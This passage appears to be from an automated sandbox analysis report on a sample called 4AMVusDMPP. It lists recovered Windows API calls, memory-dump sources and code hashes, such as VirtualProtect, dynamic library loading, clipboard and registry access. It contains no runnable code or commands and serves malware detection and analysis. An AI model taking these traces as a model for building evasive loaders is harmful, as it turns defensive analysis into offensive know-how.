                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: FileWrite
                                                          • String ID:
                                                          • API String ID: 3934441357-0
                                                          • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                          • Instruction ID: 11bffb161eade2b6c2cb4bf4b25223a29cd6195b7324502744f40ed25e3c63a9
                                                          • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                          • Instruction Fuzzy Hash: 20E08C3220125BEBEF119E518C00AEBBB6CFB003A0F004432FD11E3180D234E9208BA8
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(6EAB505C,00000004,00000040,6EAB504C), ref: 6EAB29B1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1764566843.000000006EAB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EAB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1764543418.000000006EAB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.1764585429.000000006EAB4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.1764610050.000000006EAB6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6eab0000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 5939fdb2077c8a33eb81c6657f788a54dffc7c9cb8ae138f6c752f4797a32f12
                                                          • Instruction ID: 3ad87797dad8cae52de56aa4879e8f188bf3311a2afb31a91b55241d02df3aaa
                                                          • Opcode Fuzzy Hash: 5939fdb2077c8a33eb81c6657f788a54dffc7c9cb8ae138f6c752f4797a32f12
                                                          • Instruction Fuzzy Hash: ABF0A5B0D08B80DECB90DF68D4847093BF6BF1A304B17C52AE148EE260E3344486CB95
                                                          APIs
                                                          • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,00422708,?,?,004062E3,00422708,00000000,?,?,Call,?), ref: 00406279
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Open
                                                          • String ID:
                                                          • API String ID: 71445658-0
                                                          • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                          • Instruction ID: 7481b87947078d819ae160a747d33610cb99cd3c2235475b1dc937127606ac98
                                                          • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                          • Instruction Fuzzy Hash: C1D0123210420DBBDF11AE90DD01FAB372DAF14714F114826FE06A4091D775D530AB14
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                          • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                          • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                          • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                          APIs
                                                          • SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                          • Instruction ID: e4171d0a4592585bcf4a2ca6fb2eaed9aff33c093be5cb9cf1e9125a9c9e1139
                                                          • Opcode Fuzzy Hash: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                          • Instruction Fuzzy Hash: 0EB09235290600ABDE214B40DE49F457A62E7A4701F008178B240640B0CAB200A1DB19
                                                          APIs
                                                          • GlobalAlloc.KERNELBASE(00000040,?,6EAB123B,?,6EAB12DF,00000019,6EAB11BE,-000000A0), ref: 6EAB1225
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1764566843.000000006EAB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EAB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1764543418.000000006EAB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.1764585429.000000006EAB4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.1764610050.000000006EAB6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6eab0000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: AllocGlobal
                                                          • String ID:
                                                          • API String ID: 3761449716-0
                                                          • Opcode ID: b0cd0690e7082c35ab15d0875f35964c30c656a6c7e6c0224afa37a68d8743e7
                                                          • Instruction ID: b896e63de47da3a112feaa975c47ab79efca5995ea1646bbcdca8b4fb5d562e6
                                                          • Opcode Fuzzy Hash: b0cd0690e7082c35ab15d0875f35964c30c656a6c7e6c0224afa37a68d8743e7
                                                          • Instruction Fuzzy Hash: 58B01270E00600DFEE008B64CC06F343254EF01301F05C010F600E8190D1244C028534
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                          • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                          • GetClientRect.USER32(?,?), ref: 00405639
                                                          • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                          • ShowWindow.USER32(?,00000008), ref: 004056DC
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004056FD
                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                          • GetDlgItem.USER32(?,000003F8), ref: 0040560B
                                                            • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                          • GetDlgItem.USER32(?,000003EC), ref: 0040574F
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                          • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                          • ShowWindow.USER32(00000000), ref: 00405788
                                                          • ShowWindow.USER32(?,00000008), ref: 0040578D
                                                          • ShowWindow.USER32(00000008), ref: 004057D7
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                          • CreatePopupMenu.USER32 ref: 0040581C
                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                          • GetWindowRect.USER32(?,?), ref: 00405850
                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                          • OpenClipboard.USER32(00000000), ref: 004058B1
                                                          • EmptyClipboard.USER32 ref: 004058B7
                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                          • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                          • CloseClipboard.USER32 ref: 00405912
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                          • String ID: (7B${
                                                          • API String ID: 590372296-525222780
                                                          • Opcode ID: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
                                                          • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                                          • Opcode Fuzzy Hash: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
                                                          • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                          • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                          • lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 004049B7
                                                          • lstrcatW.KERNEL32(?,Call), ref: 004049C3
                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                            • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45
                                                            • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                            • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                            • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                            • Part of subcall function 0040667C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                          • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A98
                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                            • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                            • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                            • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: (7B$A$Call
                                                          • API String ID: 2624150263-413618503
                                                          • Opcode ID: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                          • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                                          • Opcode Fuzzy Hash: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                          • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                                          APIs
                                                            • Part of subcall function 6EAB121B: GlobalAlloc.KERNELBASE(00000040,?,6EAB123B,?,6EAB12DF,00000019,6EAB11BE,-000000A0), ref: 6EAB1225
                                                          • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 6EAB1C6B
                                                          • lstrcpyW.KERNEL32(00000008,?), ref: 6EAB1CB3
                                                          • lstrcpyW.KERNEL32(00000808,?), ref: 6EAB1CBD
                                                          • GlobalFree.KERNEL32(00000000), ref: 6EAB1CD0
                                                          • GlobalFree.KERNEL32(?), ref: 6EAB1DB2
                                                          • GlobalFree.KERNEL32(?), ref: 6EAB1DB7
                                                          • GlobalFree.KERNEL32(?), ref: 6EAB1DBC
                                                          • GlobalFree.KERNEL32(00000000), ref: 6EAB1FA6
                                                          • lstrcpyW.KERNEL32(?,?), ref: 6EAB2140
                                                          • GetModuleHandleW.KERNEL32(00000008), ref: 6EAB21B5
                                                          • LoadLibraryW.KERNEL32(00000008), ref: 6EAB21C6
                                                          • GetProcAddress.KERNEL32(?,?), ref: 6EAB2220
                                                          • lstrlenW.KERNEL32(00000808), ref: 6EAB223A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1764566843.000000006EAB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EAB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1764543418.000000006EAB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.1764585429.000000006EAB4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.1764610050.000000006EAB6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6eab0000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                          • String ID:
                                                          • API String ID: 245916457-0
                                                          • Opcode ID: f5388446ecbb61c6940b0a72562bf5393f302ed00ea0195cd3397a5e3ecb1724
                                                          • Instruction ID: 12e7e84035b6bb8cc696186d95a3c979594dcdc7f2da310211a7ea3a6c3d1715
                                                          • Opcode Fuzzy Hash: f5388446ecbb61c6940b0a72562bf5393f302ed00ea0195cd3397a5e3ecb1724
                                                          • Instruction Fuzzy Hash: 54229871D2420ADEDB508FE9C4846FABBF8FF16305F20452AD1A5E7280D7745AC9CB68
                                                          APIs
                                                          • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: CreateInstance
                                                          • String ID:
                                                          • API String ID: 542301482-0
                                                          • Opcode ID: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
                                                          • Instruction ID: a370b0fa9b2e606d6813e98b4c017b265e4ea8c47d708310f479c561ceb58c7b
                                                          • Opcode Fuzzy Hash: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
                                                          • Instruction Fuzzy Hash: 80414A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: FileFindFirst
                                                          • String ID:
                                                          • API String ID: 1974802433-0
                                                          • Opcode ID: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                                          • Instruction ID: e6f127318fd58302517648c6e406f49d0db104963aa8d987e753e5cb7f87edca
                                                          • Opcode Fuzzy Hash: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                                          • Instruction Fuzzy Hash: EDF08271A14104EBDB10DBA4DA499AEB378EF14314F60467BF545F21E0DBB45D809B2A
                                                          APIs
                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
                                                          • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
                                                          • GetSysColor.USER32(?), ref: 004045FE
                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                          • lstrlenW.KERNEL32(?), ref: 0040461F
                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                          • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                          • SendMessageW.USER32(00000000), ref: 004046A1
                                                          • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                          • SetCursor.USER32(00000000), ref: 00404720
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                          • SetCursor.USER32(00000000), ref: 0040473C
                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                          • String ID: Call$N
                                                          • API String ID: 3103080414-3438112850
                                                          • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                          • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                                          • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                          • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                                          APIs
                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F
                                                          • API String ID: 941294808-1304234792
                                                          • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                          • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                          • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                          • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                          APIs
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                          • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
                                                            • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                            • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                          • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                                          • wsprintfA.USER32 ref: 004060B3
                                                          • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
